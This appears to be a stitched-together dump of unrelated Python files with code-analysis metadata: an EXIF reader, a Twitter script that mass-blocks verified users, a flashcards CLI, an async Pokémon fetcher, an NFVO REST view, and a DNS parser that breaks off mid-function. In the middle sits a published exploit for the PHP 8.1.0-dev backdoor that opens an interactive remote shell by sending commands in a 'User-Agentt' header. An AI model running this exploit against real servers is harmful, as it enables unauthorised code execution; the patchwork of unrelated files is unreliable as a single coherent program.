    glob_path = os.path.join(input_directory, '*.jpg')
    filepaths = glob.glob(glob_path)
    for filepath in filepaths:
        filename, extension = os.path.splitext(filepath)
        try:
            # img = PILimage.open(path + filename)
            img = PILimage.open(filepath)
            image = Worker(img)
            date = image.date
            print(date)
        except Exception as e:
            # Best-effort: skip unreadable files / missing EXIF and keep going.
            print(e)
| [
"PIL.Image.open",
"os.path.splitext",
"os.path.join",
"PIL.ExifTags.TAGS.get",
"os.getcwd",
"PIL.ExifTags.GPSTAGS.get",
"glob.glob"
] | [((1394, 1432), 'os.path.join', 'os.path.join', (['input_directory', '"""*.jpg"""'], {}), "(input_directory, '*.jpg')\n", (1406, 1432), False, 'import os\n'), ((1450, 1470), 'glob.glob', 'glob.glob', (['glob_path'], {}), '(glob_path)\n', (1459, 1470), False, 'import glob\n'), ((1356, 1367), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (1365, 1367), False, 'import os\n'), ((1533, 1559), 'os.path.splitext', 'os.path.splitext', (['filepath'], {}), '(filepath)\n', (1549, 1559), False, 'import os\n'), ((1643, 1666), 'PIL.Image.open', 'PILimage.open', (['filepath'], {}), '(filepath)\n', (1656, 1666), True, 'import PIL.Image as PILimage\n'), ((655, 673), 'PIL.ExifTags.TAGS.get', 'TAGS.get', (['tag', 'tag'], {}), '(tag, tag)\n', (663, 673), False, 'from PIL.ExifTags import TAGS, GPSTAGS\n'), ((823, 840), 'PIL.ExifTags.GPSTAGS.get', 'GPSTAGS.get', (['t', 't'], {}), '(t, t)\n', (834, 840), False, 'from PIL.ExifTags import TAGS, GPSTAGS\n')] |
#!/usr/bin/python3
#### A tool for blocking all verified users on Twitter.
## You may want to create a (public or private) Twitter list named 'exceptions' and add verified users to it.
## This 'exceptions' list that you create on Twitter is for verified accounts that you like and do not want to block.
#### Import dependencies
import json
import tweepy
import re
import random
import sys
import timeit
#### Define variables
start = timeit.default_timer()  # reference time for calc_time()
exception_title = 'exceptions'     # name of the Twitter list of protected users
mypath = "blocked.txt"             # local file recording already-blocked ids
counter = 0                        # running count of newly blocked users
def get_api_keys():
    """Load the Twitter API key dictionary from /usr/local/keys.json.

    Falls back to interactive entry when the key file is missing; any
    other failure (bad JSON, missing dict keys) is reported and re-raised.
    :returns: dict with the API credential fields.
    """
    #### Set Twitter API key dictionary
    try:  #### Attempt to load API keys file
        # Use a context manager so the file handle is always closed
        # (the original left the handle open).
        with open('/usr/local/keys.json') as keys_file:
            keys_json = json.load(keys_file)
        #### Specify key dictionary wanted (generally [Platform][User][API])
        Keys = keys_json["Twitter"]["ClimateCong_Bot"]["ClimatePolitics"]
        #Keys = keys_json["Twitter"]["AGreenDCBike"]["HearHerVoice"]
    except FileNotFoundError:
        # Key file absent: prompt the user for each credential instead.
        print("\nNo twitter API key was found in /usr/local/keys.json\n",
              "Acquire an API key at https://apps.twitter.com/\n",
              "to supply key manually press Enter\n")
        Keys = {}
        Keys['Consumer Key (API Key)'] = input('Enter the Twitter API Consumer Key\n')
        Keys['Consumer Secret (API Secret)'] = input('Enter the Twitter API Consumer Secret Key\n')
        Keys['Bearer Token'] = input('Enter the Bearer Token\n')
        Keys['Owner'] = input('Enter your Twitter username associated with the API keys\n')
    except Exception as e:
        # The original printed the error and then hit UnboundLocalError on
        # return; surface the real cause instead.
        print(e)
        raise
    return Keys
#### Get keys
Keys = get_api_keys()
#### Access Twitter API using Tweepy & key dictionary definitions
# v2 client (bearer token) and v1.1 API object (app auth) side by side;
# the rest of this script only visibly uses `api`.
client = tweepy.Client( Keys['Bearer Token'] )
auth = tweepy.OAuth2AppHandler( Keys['Consumer Key (API Key)'], Keys['Consumer Secret (API Secret)'] )
api = tweepy.API(auth)
#### Fetch the user id's of those listed in the exceptions list
def get_exceptions_list():
    """Return the user ids of everyone on the 'exceptions' Twitter list."""
    members = []
    # Page through the list membership and collect every member object.
    for page in tweepy.Cursor(api.list_members, user, exception_title).pages():
        members.extend(page)
    return [member.id for member in members]
#### Checks id against exceptions list
def check_exceptions_list(a_user_id_2_block):
if a_user_id_2_block in protect_list:
#print("User is on exceptions list & will not be blocked:", a_user_id_2_block, end='\r')
return None
else:
return(a_user_id_2_block)
#### Returns a human readable time difference
def calc_time():
#Stop the timer
stop = timeit.default_timer()
total_time = stop - start
#Formate running time.
mins, secs = divmod(total_time, 60)
hours, mins = divmod(mins, 60)
timed = str("%d:%d:%d" % (hours, mins, secs))
return(timed)
#### Check if user is already blocked, blocks & add to list if not
def append_to_blocked_list(a_user_id_2_block):
with open(mypath, "r+", newline=None) as file:
for line in file:
if str(a_user_id_2_block) in line:
#print("Previously added to block list")
return None
else: # not found, we are at the eof
pass
file.write(str(a_user_id_2_block) + '\n') # append missing data
try:
api.create_block(a_user_id_2_block, wait_on_rate_limit=True)
except (ConnectionError, TimeoutError):
print("Will retry again in a little bit")
input("Press Enter to continue...")
except Exception as e:
er = e
if e.api_code == 160:
print("Request to befriend made, pending approval")
if e.api_code == 50:
print("User not found", str(a_user_id_2_block))
return("New")
#### Increments counter by 1, if count is divisible by 100 print the count & time elapsed.
def add_2_counter(counter):
    """Increment the block counter; report progress every 100 blocks."""
    counter = counter + 1
    if counter % 100 == 0:
        # Milestone: show elapsed wall time alongside the total.
        print("Time elapsed:", calc_time(), " Users blocked:", str(counter))
    else:
        # Overwrite the same console line for intermediate counts.
        print(counter, end='\r')
    return counter
#### Process user id, check exceptions list, check & block & append to blocked list, trigger counter
def process_a_user_id(a_user_id, counter):
a_user_id_2_block = check_exceptions_list(a_user_id)
if a_user_id_2_block is not None:
#Check if user is already blocked & block if not
new_block = append_to_blocked_list(a_user_id_2_block)
if new_block is not None:
counter = add_2_counter(counter)
return(counter)
#### Get an id from user & send to id processing
def process_a_user(a_user, counter):
if a_user.verified == True:
a_user_id = a_user.id
counter = process_a_user_id(a_user_id, counter)
else:
pass
return(counter)
#### Work flow
#### Acquire 'exceptions' list for blocking protection/exclusion
# NOTE(review): `user` is referenced below (and inside get_exceptions_list)
# but is never assigned anywhere in this file -- this raises NameError at
# runtime; confirm the intended account handle and define it.
protect_list = get_exceptions_list()
print("Protect list number of entries =", len(protect_list))
#### Block verified users that are on the twitter managed verified list
for a_user_id_2_block in tweepy.Cursor(api.friends_ids, id="verified", wait_on_rate_limit=True).items():
    counter = process_a_user_id(a_user_id_2_block, counter)
#### Block verified users that are following you
for a_user in tweepy.Cursor(api.followers, screen_name=user, wait_on_rate_limit=True).items():
    counter = process_a_user(a_user, counter)
#### Block verified users that are following the user handle "Twitter"
for a_user in tweepy.Cursor(api.followers, screen_name="Twitter", wait_on_rate_limit=True).items():
    counter = process_a_user(a_user, counter)
###################################################################
# Do not use any of the code I have written with harmful intent. #
# #
# By using this code you accept that everyone has the #
# right to choose their own gender identity. #
###################################################################
| [
"tweepy.OAuth2AppHandler",
"tweepy.Cursor",
"timeit.default_timer",
"tweepy.API",
"tweepy.Client"
] | [((436, 458), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (456, 458), False, 'import timeit\n'), ((1903, 1938), 'tweepy.Client', 'tweepy.Client', (["Keys['Bearer Token']"], {}), "(Keys['Bearer Token'])\n", (1916, 1938), False, 'import tweepy\n'), ((1948, 2046), 'tweepy.OAuth2AppHandler', 'tweepy.OAuth2AppHandler', (["Keys['Consumer Key (API Key)']", "Keys['Consumer Secret (API Secret)']"], {}), "(Keys['Consumer Key (API Key)'], Keys[\n 'Consumer Secret (API Secret)'])\n", (1971, 2046), False, 'import tweepy\n'), ((2050, 2066), 'tweepy.API', 'tweepy.API', (['auth'], {}), '(auth)\n', (2060, 2066), False, 'import tweepy\n'), ((2770, 2792), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (2790, 2792), False, 'import timeit\n'), ((5292, 5362), 'tweepy.Cursor', 'tweepy.Cursor', (['api.friends_ids'], {'id': '"""verified"""', 'wait_on_rate_limit': '(True)'}), "(api.friends_ids, id='verified', wait_on_rate_limit=True)\n", (5305, 5362), False, 'import tweepy\n'), ((5496, 5567), 'tweepy.Cursor', 'tweepy.Cursor', (['api.followers'], {'screen_name': 'user', 'wait_on_rate_limit': '(True)'}), '(api.followers, screen_name=user, wait_on_rate_limit=True)\n', (5509, 5567), False, 'import tweepy\n'), ((5709, 5785), 'tweepy.Cursor', 'tweepy.Cursor', (['api.followers'], {'screen_name': '"""Twitter"""', 'wait_on_rate_limit': '(True)'}), "(api.followers, screen_name='Twitter', wait_on_rate_limit=True)\n", (5722, 5785), False, 'import tweepy\n'), ((2214, 2268), 'tweepy.Cursor', 'tweepy.Cursor', (['api.list_members', 'user', 'exception_title'], {}), '(api.list_members, user, exception_title)\n', (2227, 2268), False, 'import tweepy\n')] |
# Exploit Title: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
# Date: 23 may 2021
# Exploit Author: flast101
# Vendor Homepage: https://www.php.net/
# Software Link:
# - https://hub.docker.com/r/phpdaily/php
# - https://github.com/phpdaily/php
# Version: 8.1.0-dev
# Tested on: Ubuntu 20.04
# References:
# - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
# - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md
"""
Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/backdoor_php_8.1.0-dev.py
Contact: <EMAIL>
An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
The following exploit uses the backdoor to provide a pseudo shell ont the host.
"""
#!/usr/bin/env python3
import os
import re
import requests
# Published ExploitDB PoC (see header); affects only the withdrawn
# 8.1.0-dev build -- kept as-is, comments only.
host = input("Enter the full host url:\n")
request = requests.Session()
# Probe the target once to decide whether to start the command loop.
response = request.get(host)
if str(response) == '<Response [200]>':
    print("\nInteractive shell is opened on", host, "\nCan't acces tty; job crontol turned off.")
    try:
        # Read-eval loop: one HTTP request per entered command.
        while 1:
            cmd = input("$ ")
            headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
            "User-Agentt": "zerodiumsystem('" + cmd + "');"
            }
            response = request.get(host, headers = headers, allow_redirects = False)
            current_page = response.text
            # Everything before the page's own HTML is the command output.
            stdout = current_page.split('<!DOCTYPE html>',1)
            text = print(stdout[0])
    except KeyboardInterrupt:
        print("Exiting...")
        exit
else:
    print("\r")
    print(response)
    print("Host is not available, aborting...")
    exit
"requests.Session"
] | [((1141, 1159), 'requests.Session', 'requests.Session', ([], {}), '()\n', (1157, 1159), False, 'import requests\n')] |
"""
Module that contains the command line app.
Why does this file exist, and why not put this in __main__?
You might be tempted to import things from __main__ later, but that will cause
problems: the code will get executed twice:
- When you run `python -mflashcards` python will execute
``__main__.py`` as a script. That means there won't be any
``flashcards.__main__`` in ``sys.modules``.
- When you import __main__ it will get executed again (as a module) because
there's no ``flashcards.__main__`` in ``sys.modules``.
Also see (1) from http://click.pocoo.org/5/setuptools/#setuptools-integration
"""
import argparse
from .flashcards import start
# NOTE(review): this module-level parser is not used by get_arguments()
# below, which builds its own parser -- looks like a leftover; confirm
# nothing imports `parser` before removing.
parser = argparse.ArgumentParser(description='Command description.')
parser.add_argument('names', metavar='NAME', nargs=argparse.ZERO_OR_MORE,
                    help="A name of something.")
def get_arguments():
    """Build the flashcards CLI parser and return the parsed arguments."""
    # Shown verbatim in --help, hence the raw-description formatter below.
    description = (
        'Flashcards is a small command line tool used to study.\n'
        'Shuffles the content for you and displays the title, once you think\n'
        'you know the answer, by pressing [Enter] you can see the content.\n\n'
        'Expected YML format (keywords are optional):\n\n'
        '-\n'
        ' topic: Python\n'
        ' content: Is a widely used high-level programming language for\n'
        '   created by <NAME> and first released in 1991.\n'
        ' keywords: programming, language\n'
        '-\n'
        ' topic: Javascript\n'
        ' content: Is a dynamic, untyped, and interpreted programming lang.\n')
    arg_parser = argparse.ArgumentParser(
        prog='flashcards',
        description=description,
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    arg_parser.add_argument('file_name', metavar='FILE_NAME',
                            help='YML file with flashcards content')
    arg_parser.add_argument('-O', '--ordered', action="store_true", default=False,
                            help='Show cards keeping the file order')
    arg_parser.add_argument('-I', '--inverted', action="store_true", default=False,
                            help='Hide the topic instead of the content')
    return arg_parser.parse_args()
def main():
    # CLI entry point: parse arguments and hand off to the study loop
    # (`start` is imported from .flashcards at the top of the module).
    args = get_arguments()
    start(args)
| [
"argparse.ArgumentParser"
] | [((686, 745), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Command description."""'}), "(description='Command description.')\n", (709, 745), False, 'import argparse\n'), ((1624, 1721), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'prog': '"""flashcards"""', 'description': 'description', 'formatter_class': 'formater'}), "(prog='flashcards', description=description,\n formatter_class=formater)\n", (1647, 1721), False, 'import argparse\n')] |
import aiohttp
import asyncio
import time
start_time = time.time()  # wall-clock reference for the final timing print
async def get_pokemon(session, url):
    """Fetch one pokemon resource and return its "name" field."""
    async with session.get(url) as resp:
        payload = await resp.json()
    return payload["name"]
async def main():
    """Fetch pokemon 1..199 concurrently and print each name in order."""
    connector = aiohttp.TCPConnector(limit=64, verify_ssl=False)
    async with aiohttp.ClientSession(connector=connector) as session:
        # Schedule every request up front, then await them together.
        futures = [
            asyncio.ensure_future(
                get_pokemon(session, f"https://pokeapi.co/api/v2/pokemon/{i}")
            )
            for i in range(1, 200)
        ]
        names = await asyncio.gather(*futures)
        for name in names:
            print(name)
asyncio.run(main())
print(f"--{(time.time()-start_time)}--") | [
"aiohttp.TCPConnector",
"time.time",
"asyncio.gather"
] | [((56, 67), 'time.time', 'time.time', ([], {}), '()\n', (65, 67), False, 'import time\n'), ((592, 614), 'asyncio.gather', 'asyncio.gather', (['*tasks'], {}), '(*tasks)\n', (606, 614), False, 'import asyncio\n'), ((285, 333), 'aiohttp.TCPConnector', 'aiohttp.TCPConnector', ([], {'limit': '(64)', 'verify_ssl': '(False)'}), '(limit=64, verify_ssl=False)\n', (305, 333), False, 'import aiohttp\n'), ((716, 727), 'time.time', 'time.time', ([], {}), '()\n', (725, 727), False, 'import time\n')] |
# -*- coding: utf-8 -*-
import logging
from logging import handlers
import pickle
import time
import uuid
from bson.binary import Binary
from bson.json_util import dumps
from flask import request
from flask_classful import FlaskView
import pymongo
from requests import ConnectTimeout, ConnectionError
from katana.shared_utils.mongoUtils import mongoUtils
from katana.shared_utils.nfvoUtils import osmUtils
# Logging Parameters
logger = logging.getLogger(__name__)
# Rotate katana.log at ~10 KB, keeping 5 backups.
file_handler = handlers.RotatingFileHandler("katana.log", maxBytes=10000, backupCount=5)
stream_handler = logging.StreamHandler()
# Same format for both the file and the console handler.
formatter = logging.Formatter("%(asctime)s %(name)s %(levelname)s %(message)s")
stream_formatter = logging.Formatter("%(asctime)s %(name)s %(levelname)s %(message)s")
file_handler.setFormatter(formatter)
stream_handler.setFormatter(stream_formatter)
logger.setLevel(logging.DEBUG)
logger.addHandler(file_handler)
logger.addHandler(stream_handler)
class NFVOView(FlaskView):
    """REST endpoints for registering and managing NFVOs (currently OSM only)."""

    route_prefix = "/api/"
    # Fields every register/update request must carry.
    req_fields = ["id", "nfvousername", "nfvopassword", "nfvoip", "tenantname"]

    def index(self):
        """
        Returns a list of nfvo and their details,
        used by: `katana nfvo ls`
        """
        nfvo_data = mongoUtils.index("nfvo")
        return_data = []
        for infvo in nfvo_data:
            return_data.append(
                dict(
                    _id=infvo["_id"],
                    nfvo_id=infvo["id"],
                    created_at=infvo["created_at"],
                    type=infvo["type"],
                )
            )
        return dumps(return_data), 200

    # @route('/all/') #/nfvo/all
    def all(self):
        """
        Same with index(self) above, but returns all nfvo details
        """
        return dumps(mongoUtils.index("nfvo")), 200

    def get(self, uuid):
        """
        Returns the details of specific nfvo,
        used by: `katana nfvo inspect [uuid]`
        """
        data = mongoUtils.get("nfvo", uuid)
        if data:
            return dumps(data), 200
        else:
            return "Not Found", 404

    def post(self):
        """
        Add a new nfvo. The request must provide the nfvo details.
        used by: `katana nfvo add -f [yaml file]`
        """
        new_uuid = str(uuid.uuid4())
        request.json["_id"] = new_uuid
        request.json["created_at"] = time.time()  # unix epoch
        request.json["tenants"] = {}
        if request.json["type"] == "OSM":
            # Create the NFVO object
            try:
                osm_username = request.json["nfvousername"]
                # Fix: read the password from the documented "nfvopassword"
                # field, consistent with req_fields and the put() handler.
                osm_password = request.json["nfvopassword"]
                osm_ip = request.json["nfvoip"]
                osm_project_name = request.json["tenantname"]
                nfvo_id = request.json["id"]
            except KeyError:
                return f"Error: Required fields: {self.req_fields}", 400
            else:
                osm = osmUtils.Osm(nfvo_id, osm_ip, osm_username, osm_password, osm_project_name)
                # Validate the credentials before persisting anything.
                try:
                    osm.getToken()
                except ConnectTimeout as e:
                    logger.exception("Connection Timeout: {}".format(e))
                    response = dumps({"error": "Unable to connect to NFVO"})
                    return (response, 400)
                except ConnectionError as e:
                    logger.exception("Connection Error: {}".format(e))
                    response = dumps({"error": "Unable to connect to NFVO"})
                    return (response, 400)
                else:
                    # Store the osm object to the mongo db
                    thebytes = pickle.dumps(osm)
                    obj_json = {"_id": new_uuid, "id": request.json["id"], "obj": Binary(thebytes)}
                    try:
                        new_uuid = mongoUtils.add("nfvo", request.json)
                    except pymongo.errors.DuplicateKeyError:
                        return f"NFVO with id {nfvo_id} already exists", 400
                    mongoUtils.add("nfvo_obj", obj_json)
                    # Get information regarding VNFDs and NSDs
                    osm.bootstrapNfvo()
            return f"Created {new_uuid}", 201
        else:
            response = dumps({"error": "This type nfvo is not supported"})
            return response, 400

    def delete(self, uuid):
        """
        Delete a specific nfvo.
        used by: `katana nfvo rm [uuid]`
        """
        del_nfvo = mongoUtils.get("nfvo", uuid)
        if del_nfvo:
            # Refuse deletion while slices/tenants still reference this NFVO.
            if del_nfvo["tenants"]:
                return "Cannot delete nfvo {} - In use".format(uuid), 400
            mongoUtils.delete("nfvo_obj", uuid)
            mongoUtils.delete_all("nsd", {"nfvo_id": del_nfvo["id"]})
            mongoUtils.delete_all("vnfd", {"nfvoid": del_nfvo["id"]})
            mongoUtils.delete("nfvo", uuid)
            return "Deleted NFVO {}".format(uuid), 200
        else:
            # if uuid is not found, return error
            return "Error: No such nfvo: {}".format(uuid), 404

    def put(self, uuid):
        """
        Update the details of a specific nfvo.
        used by: `katana nfvo update -f [yaml file] [uuid]`
        """
        data = request.json
        data["_id"] = uuid
        old_data = mongoUtils.get("nfvo", uuid)
        if old_data:
            data["created_at"] = old_data["created_at"]
            data["tenants"] = old_data["tenants"]
            try:
                # Connection-defining fields are immutable once registered.
                for entry in self.req_fields:
                    if data[entry] != old_data[entry]:
                        return "Cannot update field: " + entry, 400
            except KeyError:
                return f"Error: Required fields: {self.req_fields}", 400
            else:
                mongoUtils.update("nfvo", uuid, data)
            return f"Modified {uuid}", 200
        else:
            # Unknown uuid: upsert semantics -- register it as a new NFVO.
            new_uuid = uuid
            data = request.json
            data["_id"] = new_uuid
            data["created_at"] = time.time()  # unix epoch
            data["tenants"] = {}
            if request.json["type"] == "OSM":
                # Create the NFVO object
                try:
                    osm_username = request.json["nfvousername"]
                    osm_password = request.json["nfvopassword"]
                    osm_ip = request.json["nfvoip"]
                    osm_project_name = request.json["tenantname"]
                    nfvo_id = request.json["id"]
                except KeyError:
                    return f"Error: Required fields: {self.req_fields}", 400
                else:
                    osm = osmUtils.Osm(
                        nfvo_id, osm_ip, osm_username, osm_password, osm_project_name
                    )
                    try:
                        osm.getToken()
                    except ConnectTimeout as e:
                        logger.exception("Connection Timeout: {}".format(e))
                        response = dumps({"error": "Unable to connect to NFVO"})
                        return (response, 400)
                    except ConnectionError as e:
                        logger.exception("Connection Error: {}".format(e))
                        response = dumps({"error": "Unable to connect to NFVO"})
                        return (response, 400)
                    else:
                        # Store the osm object to the mongo db
                        thebytes = pickle.dumps(osm)
                        obj_json = {"_id": new_uuid, "id": data["id"], "obj": Binary(thebytes)}
                        try:
                            new_uuid = mongoUtils.add("nfvo", data)
                        except pymongo.errors.DuplicateKeyError:
                            return f"NFVO with id {nfvo_id} already exists", 400
                        mongoUtils.add("nfvo_obj", obj_json)
                        # Get information regarding VNFDs and NSDs
                        osm.bootstrapNfvo()
            else:
                response = dumps({"error": "This type nfvo is not supported"})
                return response, 400
            return f"Created {new_uuid}", 201
| [
"logging.getLogger",
"katana.shared_utils.mongoUtils.mongoUtils.add",
"logging.StreamHandler",
"katana.shared_utils.mongoUtils.mongoUtils.update",
"katana.shared_utils.mongoUtils.mongoUtils.delete_all",
"bson.binary.Binary",
"katana.shared_utils.nfvoUtils.osmUtils.Osm",
"logging.Formatter",
"katana.... | [((439, 466), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (456, 466), False, 'import logging\n'), ((482, 555), 'logging.handlers.RotatingFileHandler', 'handlers.RotatingFileHandler', (['"""katana.log"""'], {'maxBytes': '(10000)', 'backupCount': '(5)'}), "('katana.log', maxBytes=10000, backupCount=5)\n", (510, 555), False, 'from logging import handlers\n'), ((573, 596), 'logging.StreamHandler', 'logging.StreamHandler', ([], {}), '()\n', (594, 596), False, 'import logging\n'), ((609, 676), 'logging.Formatter', 'logging.Formatter', (['"""%(asctime)s %(name)s %(levelname)s %(message)s"""'], {}), "('%(asctime)s %(name)s %(levelname)s %(message)s')\n", (626, 676), False, 'import logging\n'), ((696, 763), 'logging.Formatter', 'logging.Formatter', (['"""%(asctime)s %(name)s %(levelname)s %(message)s"""'], {}), "('%(asctime)s %(name)s %(levelname)s %(message)s')\n", (713, 763), False, 'import logging\n'), ((1230, 1254), 'katana.shared_utils.mongoUtils.mongoUtils.index', 'mongoUtils.index', (['"""nfvo"""'], {}), "('nfvo')\n", (1246, 1254), False, 'from katana.shared_utils.mongoUtils import mongoUtils\n'), ((1960, 1988), 'katana.shared_utils.mongoUtils.mongoUtils.get', 'mongoUtils.get', (['"""nfvo"""', 'uuid'], {}), "('nfvo', uuid)\n", (1974, 1988), False, 'from katana.shared_utils.mongoUtils import mongoUtils\n'), ((2367, 2378), 'time.time', 'time.time', ([], {}), '()\n', (2376, 2378), False, 'import time\n'), ((4405, 4433), 'katana.shared_utils.mongoUtils.mongoUtils.get', 'mongoUtils.get', (['"""nfvo"""', 'uuid'], {}), "('nfvo', uuid)\n", (4419, 4433), False, 'from katana.shared_utils.mongoUtils import mongoUtils\n'), ((5209, 5237), 'katana.shared_utils.mongoUtils.mongoUtils.get', 'mongoUtils.get', (['"""nfvo"""', 'uuid'], {}), "('nfvo', uuid)\n", (5223, 5237), False, 'from katana.shared_utils.mongoUtils import mongoUtils\n'), ((1584, 1602), 'bson.json_util.dumps', 'dumps', (['return_data'], {}), '(return_data)\n', (1589, 
1602), False, 'from bson.json_util import dumps\n'), ((2277, 2289), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (2287, 2289), False, 'import uuid\n'), ((4175, 4226), 'bson.json_util.dumps', 'dumps', (["{'error': 'This type nfvo is not supported'}"], {}), "({'error': 'This type nfvo is not supported'})\n", (4180, 4226), False, 'from bson.json_util import dumps\n'), ((4577, 4612), 'katana.shared_utils.mongoUtils.mongoUtils.delete', 'mongoUtils.delete', (['"""nfvo_obj"""', 'uuid'], {}), "('nfvo_obj', uuid)\n", (4594, 4612), False, 'from katana.shared_utils.mongoUtils import mongoUtils\n'), ((4625, 4682), 'katana.shared_utils.mongoUtils.mongoUtils.delete_all', 'mongoUtils.delete_all', (['"""nsd"""', "{'nfvo_id': del_nfvo['id']}"], {}), "('nsd', {'nfvo_id': del_nfvo['id']})\n", (4646, 4682), False, 'from katana.shared_utils.mongoUtils import mongoUtils\n'), ((4695, 4752), 'katana.shared_utils.mongoUtils.mongoUtils.delete_all', 'mongoUtils.delete_all', (['"""vnfd"""', "{'nfvoid': del_nfvo['id']}"], {}), "('vnfd', {'nfvoid': del_nfvo['id']})\n", (4716, 4752), False, 'from katana.shared_utils.mongoUtils import mongoUtils\n'), ((4765, 4796), 'katana.shared_utils.mongoUtils.mongoUtils.delete', 'mongoUtils.delete', (['"""nfvo"""', 'uuid'], {}), "('nfvo', uuid)\n", (4782, 4796), False, 'from katana.shared_utils.mongoUtils import mongoUtils\n'), ((5911, 5922), 'time.time', 'time.time', ([], {}), '()\n', (5920, 5922), False, 'import time\n'), ((1772, 1796), 'katana.shared_utils.mongoUtils.mongoUtils.index', 'mongoUtils.index', (['"""nfvo"""'], {}), "('nfvo')\n", (1788, 1796), False, 'from katana.shared_utils.mongoUtils import mongoUtils\n'), ((2025, 2036), 'bson.json_util.dumps', 'dumps', (['data'], {}), '(data)\n', (2030, 2036), False, 'from bson.json_util import dumps\n'), ((2942, 3017), 'katana.shared_utils.nfvoUtils.osmUtils.Osm', 'osmUtils.Osm', (['nfvo_id', 'osm_ip', 'osm_username', 'osm_password', 'osm_project_name'], {}), '(nfvo_id, osm_ip, osm_username, osm_password, 
osm_project_name)\n', (2954, 3017), False, 'from katana.shared_utils.nfvoUtils import osmUtils\n'), ((3607, 3624), 'pickle.dumps', 'pickle.dumps', (['osm'], {}), '(osm)\n', (3619, 3624), False, 'import pickle\n'), ((3956, 3992), 'katana.shared_utils.mongoUtils.mongoUtils.add', 'mongoUtils.add', (['"""nfvo_obj"""', 'obj_json'], {}), "('nfvo_obj', obj_json)\n", (3970, 3992), False, 'from katana.shared_utils.mongoUtils import mongoUtils\n'), ((5688, 5725), 'katana.shared_utils.mongoUtils.mongoUtils.update', 'mongoUtils.update', (['"""nfvo"""', 'uuid', 'data'], {}), "('nfvo', uuid, data)\n", (5705, 5725), False, 'from katana.shared_utils.mongoUtils import mongoUtils\n'), ((7837, 7888), 'bson.json_util.dumps', 'dumps', (["{'error': 'This type nfvo is not supported'}"], {}), "({'error': 'This type nfvo is not supported'})\n", (7842, 7888), False, 'from bson.json_util import dumps\n'), ((3202, 3247), 'bson.json_util.dumps', 'dumps', (["{'error': 'Unable to connect to NFVO'}"], {}), "({'error': 'Unable to connect to NFVO'})\n", (3207, 3247), False, 'from bson.json_util import dumps\n'), ((3422, 3467), 'bson.json_util.dumps', 'dumps', (["{'error': 'Unable to connect to NFVO'}"], {}), "({'error': 'Unable to connect to NFVO'})\n", (3427, 3467), False, 'from bson.json_util import dumps\n'), ((3703, 3719), 'bson.binary.Binary', 'Binary', (['thebytes'], {}), '(thebytes)\n', (3709, 3719), False, 'from bson.binary import Binary\n'), ((3773, 3809), 'katana.shared_utils.mongoUtils.mongoUtils.add', 'mongoUtils.add', (['"""nfvo"""', 'request.json'], {}), "('nfvo', request.json)\n", (3787, 3809), False, 'from katana.shared_utils.mongoUtils import mongoUtils\n'), ((6532, 6607), 'katana.shared_utils.nfvoUtils.osmUtils.Osm', 'osmUtils.Osm', (['nfvo_id', 'osm_ip', 'osm_username', 'osm_password', 'osm_project_name'], {}), '(nfvo_id, osm_ip, osm_username, osm_password, osm_project_name)\n', (6544, 6607), False, 'from katana.shared_utils.nfvoUtils import osmUtils\n'), ((7295, 7312), 
'pickle.dumps', 'pickle.dumps', (['osm'], {}), '(osm)\n', (7307, 7312), False, 'import pickle\n'), ((7652, 7688), 'katana.shared_utils.mongoUtils.mongoUtils.add', 'mongoUtils.add', (['"""nfvo_obj"""', 'obj_json'], {}), "('nfvo_obj', obj_json)\n", (7666, 7688), False, 'from katana.shared_utils.mongoUtils import mongoUtils\n'), ((6858, 6903), 'bson.json_util.dumps', 'dumps', (["{'error': 'Unable to connect to NFVO'}"], {}), "({'error': 'Unable to connect to NFVO'})\n", (6863, 6903), False, 'from bson.json_util import dumps\n'), ((7094, 7139), 'bson.json_util.dumps', 'dumps', (["{'error': 'Unable to connect to NFVO'}"], {}), "({'error': 'Unable to connect to NFVO'})\n", (7099, 7139), False, 'from bson.json_util import dumps\n'), ((7387, 7403), 'bson.binary.Binary', 'Binary', (['thebytes'], {}), '(thebytes)\n', (7393, 7403), False, 'from bson.binary import Binary\n'), ((7465, 7493), 'katana.shared_utils.mongoUtils.mongoUtils.add', 'mongoUtils.add', (['"""nfvo"""', 'data'], {}), "('nfvo', data)\n", (7479, 7493), False, 'from katana.shared_utils.mongoUtils import mongoUtils\n')] |
import threading
import traceback
import socketserver
import struct
import time
import sys
import http.client
import json
import uuid
import config
import dns.rdatatype
import dns.rdataclass
args = config.args
QTYPES = {1:'A', 15: 'MX', 6: 'SOA'}
custom_mx = uuid.uuid4().hex
# https://github.com/shuque/pydig GNUv2 (edited)
def txt2domainname(input, canonical_form=False):
    """Encode a textual domain name into DNS wire format (RFC 1035).

    Each dot-separated label becomes a length byte followed by the label
    bytes; the root name "." encodes as a single zero byte.  When
    *canonical_form* is true, labels are lowercased before encoding.
    """
    if input == ".":
        return b'\x00'
    wire_parts = []
    for label in input.split('.'):
        raw = label.encode('ascii')
        if canonical_form:
            raw = raw.lower()
        # one length octet, then the label bytes themselves
        wire_parts.append(struct.pack('B', len(raw)))
        wire_parts.append(raw)
    return b"".join(wire_parts)
# https://github.com/shuque/pydig GNUv2 (edited)
def get_domainname(pkt, offset):
    """Decode a domain name at packet offset *offset*; see RFC 1035 sec 4.1.4.

    Returns (labellist, offset): the list of raw label bytes (terminated by
    b'' for the root label) and the offset just past the name.  Compression
    pointers are followed recursively; the returned offset is past the
    2-byte pointer, not past the pointed-to name.
    """
    global count_compression
    labellist = []  # a domainname is a sequence of labels
    Done = False
    while not Done:
        llen, = struct.unpack('B', pkt[offset:offset+1])
        if (llen >> 6) == 0x3:  # compression pointer, sec 4.1.4
